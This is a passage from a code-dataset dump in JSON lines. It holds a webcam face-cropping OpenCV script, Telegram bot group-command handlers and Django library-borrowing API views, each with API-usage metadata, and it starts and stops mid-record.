"mysql.connector.connector.connect", "line_number": 37, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 37, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 37, "usage_type": "name"}, {"api_name": "streamlit.markdown", "line_number": 60, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 61, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 62, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 63, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 64, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 67, "usage_type": "call"}, {"api_name": "streamlit.file_uploader", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 86, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 87, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "streamlit.columns", "line_number": 91, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 93, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 94, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 95, "usage_type": "call"}, {"api_name": "streamlit.image", "line_number": 96, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 99, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 100, "usage_type": "call"}, {"api_name": "streamlit.spinner", "line_number": 101, "usage_type": "call"}, {"api_name": "streamlit.set_option", "line_number": 102, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 104, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 107, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 108, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 161, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 163, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 167, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 168, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 169, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 178, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 181, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 189, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 197, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 198, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 200, "usage_type": 
"call"}, {"api_name": "streamlit.success", "line_number": 206, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 210, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 212, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 220, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 221, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 227, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 228, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 229, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 230, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 231, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 233, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 235, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 236, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 243, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 251, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 252, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 255, "usage_type": "call"}, {"api_name": "streamlit.success", "line_number": 258, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 260, "usage_type": "call"}, {"api_name": "streamlit.button", "line_number": 262, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 264, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 265, "usage_type": "call"}]}
+{"seq_id": "23746225844", "text": "import cv2\nimport numpy as np\nimport sqlite3\nimport os #truy cap duong dan\n\nface_cascade=cv2.CascadeClassifier(\"E:/PycharmProjects/OpenCV/Resources/haarcascade_frontalface_default.xml\")\n\ncap=cv2.VideoCapture(0)\n\nsampleNum=0\n\nwhile(True):\n ret,frame=cap.read()\n gray=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray,1.3,5)\n\n for(x,y,w,h) in faces:\n # cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)\n faces = frame[y:y + h+15, x:x + w+15]\n if not os.path.exists('dataset'):\n os.makedirs('dataset')\n output=cv2.resize(faces,(160,160))\n sampleNum+=1\n cv2.imwrite('dataset/nhat' + str(sampleNum) + '.jpg',output)\n # cv2.imwrite('dataset/User.'+str(2)+'.'+ str(sampleNum) +'.jpg',gray[y:y+h,x:x+w])\n print(sampleNum)\n cv2.imshow('frame',frame)\n cv2.waitKey(1)\n\n if sampleNum>90:\n break\n\ncap.release() #giphong\ncv2.destroyAllWindows()", "repo_name": "huyvn799/face_recognition", "sub_path": "cropface.py", "file_name": "cropface.py", "file_ext": "py", "file_size_in_byte": 957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "30483704838", "text": "from aiogram import types\nfrom aiogram.dispatcher.filters import Regexp\n\nfrom service import ai\nfrom loader import dp\nfrom pydub import AudioSegment\nfrom utils.db.aiomysql import BotDB\nfrom utils.misc.throttling import rate_limit\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['in'], commands_prefix=\"/!@\")\nasync def command_in(message: types.Message):\n if await BotDB.check_chat_user(message.chat.id, message.from_user.id) == 0:\n await BotDB.add_user(message.chat.id, message.from_user.id,\n message.from_user.first_name, message.from_user.username)\n await message.answer(f'{message.from_user.first_name} добавлен в список')\n else:\n await message.answer('Вы уже в списке')\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['out'], commands_prefix=\"/!@\")\nasync def send_welcome(message: types.Message):\n if message.chat.id == -1001299519078:\n await message.reply('Бездарям запрещена команда')\n return\n if await BotDB.check_chat_user(message.chat.id, message.from_user.id):\n await BotDB.remove_user(message.chat.id, message.from_user.id)\n await message.answer(f'{message.from_user.first_name} удалён из списка')\n else:\n await message.answer('Вас нет в списке')\n\n\n@rate_limit(limit=10)\n@dp.message_handler(Regexp(\"(@|/|!)all\"), chat_type=[\"group\", \"supergroup\"])\nasync def all_command(message: types.Message):\n if await BotDB.check_chat(message.chat.id):\n p = ''\n for line in await BotDB.all_user(message.chat.id):\n p += f'{line[1]} '\n if message.reply_to_message:\n await dp.bot.send_message(message.chat.id, p, reply_to_message_id=message.reply_to_message.message_id)\n else:\n await message.reply(p)\n else:\n await message.reply('Сперва используйте /in')\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['text'], commands_prefix=\"/!@\", is_reply=True)\nasync def voice_convert(message: types.Message):\n if message.reply_to_message.voice or message.reply_to_message.video_note:\n if message.reply_to_message.voice:\n link = message.reply_to_message.voice\n else:\n link = message.reply_to_message.video_note\n file = await dp.bot.get_file(link.file_id)\n file_path = file.file_path\n file_id = f\"temp/{message.from_user.id - message.message_id}\"\n if message.reply_to_message.voice:\n await dp.bot.download_file(file_path, f\"{file_id}.ogg\")\n else:\n await dp.bot.download_file(file_path, f\"{file_id}.mp4\")\n AudioSegment.from_file(f\"{file_id}.mp4\", format=\"mp4\").export(\n f\"{file_id}.ogg\", format=\"ogg\")\n answer = await ai.openai_audio(file_id, message.chat.id, message.message_id)\n if answer:\n await message.reply_to_message.reply(answer)\n await message.delete()\n else:\n await message.reply(\"Отправьте команду ответом на голосовое/видео сообщение\")\n\n\n@rate_limit(limit=5)\n@dp.message_handler(chat_type=[\"group\", \"supergroup\"], commands=['text'], commands_prefix=\"/!@\")\nasync def voice_convert(message: types.Message):\n await message.reply(\"Отправьте команду ответом на голосовое/видео сообщение\")\n", "repo_name": "papayyg/ProPhet", "sub_path": "handlers/groups/group_basic.py", "file_name": "group_basic.py", "file_ext": "py", "file_size_in_byte": 3566, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aiogram.types.Message", "line_number": 13, "usage_type": "attribute"}, {"api_name": "aiogram.types", 
"line_number": 13, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.check_chat_user", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.add_user", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 15, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 11, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 12, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 12, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 24, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.check_chat_user", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 28, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.remove_user", "line_number": 29, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 22, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 23, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 23, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 37, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.check_chat", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.db.aiomysql.BotDB.all_user", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.db.aiomysql.BotDB", "line_number": 40, "usage_type": "name"}, {"api_name": "loader.dp.bot.send_message", "line_number": 43, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 43, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 43, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 35, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 36, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 36, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Regexp", "line_number": 36, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 52, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 52, "usage_type": "name"}, {"api_name": "loader.dp.bot.get_file", "line_number": 58, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 58, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 58, "usage_type": "name"}, {"api_name": "loader.dp.bot.download_file", "line_number": 62, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 62, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 62, "usage_type": "name"}, {"api_name": "loader.dp.bot.download_file", "line_number": 64, "usage_type": "call"}, {"api_name": "loader.dp.bot", "line_number": 64, "usage_type": "attribute"}, {"api_name": "loader.dp", "line_number": 64, "usage_type": "name"}, {"api_name": "pydub.AudioSegment.from_file", "line_number": 65, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 65, "usage_type": "name"}, {"api_name": "service.ai.openai_audio", "line_number": 67, "usage_type": "call"}, 
{"api_name": "service.ai", "line_number": 67, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 50, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 51, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 77, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 77, "usage_type": "name"}, {"api_name": "utils.misc.throttling.rate_limit", "line_number": 75, "usage_type": "call"}, {"api_name": "loader.dp.message_handler", "line_number": 76, "usage_type": "call"}, {"api_name": "loader.dp", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "37374575451", "text": "from django.http import JsonResponse\nfrom http import HTTPStatus\nfrom rest_framework.generics import GenericAPIView\nfrom Libraryapp.Serializers.BorrowSerializer import BorrowSerializer, GETBorrowSerializer\nfrom Libraryapp.utils.functions import log_print\nfrom Libraryapp.models import Borrow, Client, Book, Library, Books_at_library\nfrom datetime import datetime\n\n\nclass GetAllView(GenericAPIView):\n \"\"\" Esse endpoint busca todos os emprestimos da biblioteca no banco\"\"\"\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n log_print(\"retornando todos os emprestimos\")\n borrow = Borrow.objects.all()\n\n list_borrows = []\n\n for result in borrow:\n print(result)\n list_borrows.append(GETBorrowSerializer(result).data) \n\n return JsonResponse({\n \"data\": list_borrows\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n \n\nclass GetAllBorrowInDebt(GenericAPIView):\n \"\"\" Esse endpoint busca todos os emprestimos em debito da biblioteca no banco\"\"\"\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n log_print(\"retornando todos os emprestimos\")\n borrow = Borrow.objects.all().filter(return_date=None)\n\n list_borrows = []\n\n for result in borrow:\n print(result)\n list_borrows.append(GETBorrowSerializer(result).data) \n\n return JsonResponse({\n \"data\": list_borrows\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\nclass GetBorrowByIdView(GenericAPIView):\n \"\"\" Esse endpoint busca um emprestimo da biblioteca por id no banco\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n log_print(\"Buscando emprestimo por id\")\n borrow = Borrow.objects.get(id=pk)\n \n data = GETBorrowSerializer(borrow).data\n\n return JsonResponse({\n \"data\": data\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST) \n \n\nclass RegisterView(GenericAPIView):\n \"\"\" Esse endpoint faz o registro de um novo emprestimo na biblioteca no banco\"\"\"\n serializer_class = BorrowSerializer\n def post(self, request, *args, **kwargs):\n try:\n request_data = request.data\n\n book_fk = request_data.get(\"book_fk\")\n client_fk = request_data.get(\"client_fk\")\n\n log_print(\"procurando cliente pelo id\")\n client = Client.objects.get(id=client_fk)\n log_print(f\"procurando emprestimos desse cliente: {client.name}\")\n borrow = (Borrow.objects\n .filter(client_fk=client.id, return_date=None)\n .count()\n )\n\n # aqui poderia ser feito a quantidade de livros que a biblioteca permite deixar emprestado pra uma só pessoa\n if borrow < 1:\n log_print(f\"Elegivel para emprestimo\")\n log_print(\"Buscando livro na biblioteca\")\n book_at_library = Books_at_library.objects.get(book_fk=book_fk)\n \n log_print(\"verificando se ainda ha livros disponiveis\")\n if(book_at_library.number_of_borrowed_books == book_at_library.book_stock):\n log_print(\"Todos os livros 
estao emprestados\")\n return JsonResponse({\n \"message\": \"Todos os livros estao emprestados\",\n }, status=HTTPStatus.BAD_REQUEST)\n \n inDate = datetime.now()\n date_formated = inDate.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n log_print(\"salvando data do emprestimo\")\n request_data[\"borrow_date\"] = date_formated\n\n log_print(\"Passando request_data para o serializer\")\n borrow_save = BorrowSerializer(data=request_data)\n \n if borrow_save.is_valid():\n log_print(\"Salvando no banco\")\n borrow_save.save()\n book_at_library.number_of_borrowed_books += 1\n book_at_library.save()\n\n return JsonResponse({\n \"message\": \"Emprestimo Cadastrado\",\n }, status=HTTPStatus.CREATED)\n else:\n return JsonResponse({\n \"message\": \"Esse cliente tem pendencia de livro\"\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\n\nclass DeleteView(GenericAPIView):\n \"\"\" Esse endpoint deleta um emprestimo da biblioteca do banco pelo seu id\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = BorrowSerializer\n def delete(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n\n log_print(\"Procurando id no banco\")\n borrow = Borrow.objects.get(id=pk)\n \n\n log_print(\"procurando o livro na biblioteca\")\n bookAtLibrary = Books_at_library.objects.get(book_fk=borrow.book_fk)\n log_print(\"removendo o numero de livros emprestados\")\n if bookAtLibrary.number_of_borrowed_books > 0:\n bookAtLibrary.number_of_borrowed_books -= 1 \n bookAtLibrary.save()\n\n log_print(\"Deletando emprestimo\")\n borrow.delete()\n\n return JsonResponse({\n \"message\": \"Emprestimo Deletado\",\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n log_print(f\"exception args: {e.args}\")\n log_print(f\"Erro ao deletar, erro -> {type(e).__name__}\")\n\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\n\nclass UpdateView(GenericAPIView):\n \"\"\" Esse endpoint atualiza dados de um livro da biblioteca no banco pelo seu id\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = BorrowSerializer\n def put(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n request_data = request.data\n\n book_fk = request_data.get(\"book_fk\")\n client_fk = request_data.get(\"client_fk\")\n library_fk = request_data.get(\"library_fk\")\n borrow_date = request_data.get(\"borrow_date\")\n end_date = request_data.get(\"end_date\")\n return_date = request_data.get(\"return_date\")\n\n\n book = Borrow.objects.get(id=pk)\n\n book.library_fk = Library.objects.get(pk=library_fk) if library_fk != None else book.library_fk\n book.book_fk = Book.objects.get(pk=book_fk) if book_fk != None else book.book_fk\n book.client_fk = Client.objects.get(pk=client_fk) if client_fk != None else book.client_fk\n book.borrow_date = borrow_date if borrow_date != None else book.borrow_date\n book.end_date = end_date if end_date != None else book.end_date\n book.return_date = return_date if return_date != None else book.return_date\n\n\n log_print(f\"Salvando no banco\")\n book.save()\n\n return JsonResponse({\n \"message\": \"Emprestimo Atualizado\",\n }, status=HTTPStatus.OK)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": 
e.args\n }, status=HTTPStatus.BAD_REQUEST)\n\n\nclass BorrowCloseView(GenericAPIView):\n \"\"\"Esse endpoint faz o fechamento de um emprestimo de livro\"\"\"\n queryset = Borrow.objects.all()\n serializer_class = GETBorrowSerializer\n def get(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk')\n log_print(\"Buscando emprestimo por id\")\n borrow = Borrow.objects.get(id=pk)\n\n if(borrow.return_date is None):\n log_print(\"Adicionando a data de devolucao\")\n inDate = datetime.now()\n date_formated = inDate.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n log_print(\"salvando emprestimo e livro na biblioteca\")\n borrow.return_date = date_formated\n borrow.save()\n\n log_print(\"procurando o livro na biblioteca\")\n bookAtLibrary = Books_at_library.objects.get(book_fk=borrow.book_fk)\n log_print(\"removendo o numerode livros emprestados\")\n if bookAtLibrary.number_of_borrowed_books > 0:\n bookAtLibrary.number_of_borrowed_books -= 1 \n bookAtLibrary.save()\n\n\n return JsonResponse({\n \"response\": \"Emprestimo finalizado\",\n }, status=HTTPStatus.OK)\n \n return JsonResponse({\n \"response\":\"Livro ja devolvido\"\n }, status=HTTPStatus.BAD_REQUEST)\n\n except Exception as e:\n return JsonResponse({\n \"message\": \"Ocorreu um erro inesperado\",\n \"exception_name\": type(e).__name__,\n \"exception_args\": e.args\n }, status=HTTPStatus.BAD_REQUEST) ", "repo_name": "pi013univesp/backend-saladeleitura", "sub_path": "Libraryapp/Views/BorrowView.py", "file_name": "BorrowView.py", "file_ext": "py", "file_size_in_byte": 10345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rest_framework.generics.GenericAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 12, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 15, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 16, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 24, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 26, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 26, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 29, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 33, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 33, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 36, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 38, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 41, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 42, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 42, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 48, "usage_type": 
"call"}, {"api_name": "django.http.JsonResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 52, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 52, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 55, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 59, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 61, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 63, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 63, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 63, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 64, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 68, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.get", "line_number": 69, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 69, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.GETBorrowSerializer", "line_number": 71, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 73, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 75, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 75, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 78, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 82, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 82, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 85, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 87, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 95, "usage_type": "call"}, {"api_name": "Libraryapp.models.Client.objects.get", "line_number": 96, "usage_type": "call"}, {"api_name": "Libraryapp.models.Client.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Client", "line_number": 96, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 97, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 98, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 105, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 106, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects.get", "line_number": 107, "usage_type": "call"}, {"api_name": "Libraryapp.models.Books_at_library.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Books_at_library", "line_number": 107, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 109, "usage_type": "call"}, {"api_name": 
"Libraryapp.utils.functions.log_print", "line_number": 111, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 112, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 114, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 114, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 116, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "name"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 119, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 122, "usage_type": "call"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 123, "usage_type": "call"}, {"api_name": "Libraryapp.utils.functions.log_print", "line_number": 126, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 131, "usage_type": "call"}, {"api_name": "http.HTTPStatus.CREATED", "line_number": 133, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 133, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 135, "usage_type": "call"}, {"api_name": "http.HTTPStatus.OK", "line_number": 137, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 137, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 140, "usage_type": "call"}, {"api_name": "http.HTTPStatus.BAD_REQUEST", "line_number": 144, "usage_type": "attribute"}, {"api_name": "http.HTTPStatus", "line_number": 144, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 147, "usage_type": "name"}, {"api_name": "Libraryapp.models.Borrow.objects.all", "line_number": 149, "usage_type": "call"}, {"api_name": "Libraryapp.models.Borrow.objects", "line_number": 149, "usage_type": "attribute"}, {"api_name": "Libraryapp.models.Borrow", "line_number": 149, "usage_type": "name"}, {"api_name": "Libraryapp.Serializers.BorrowSerializer.BorrowSerializer", "line_number": 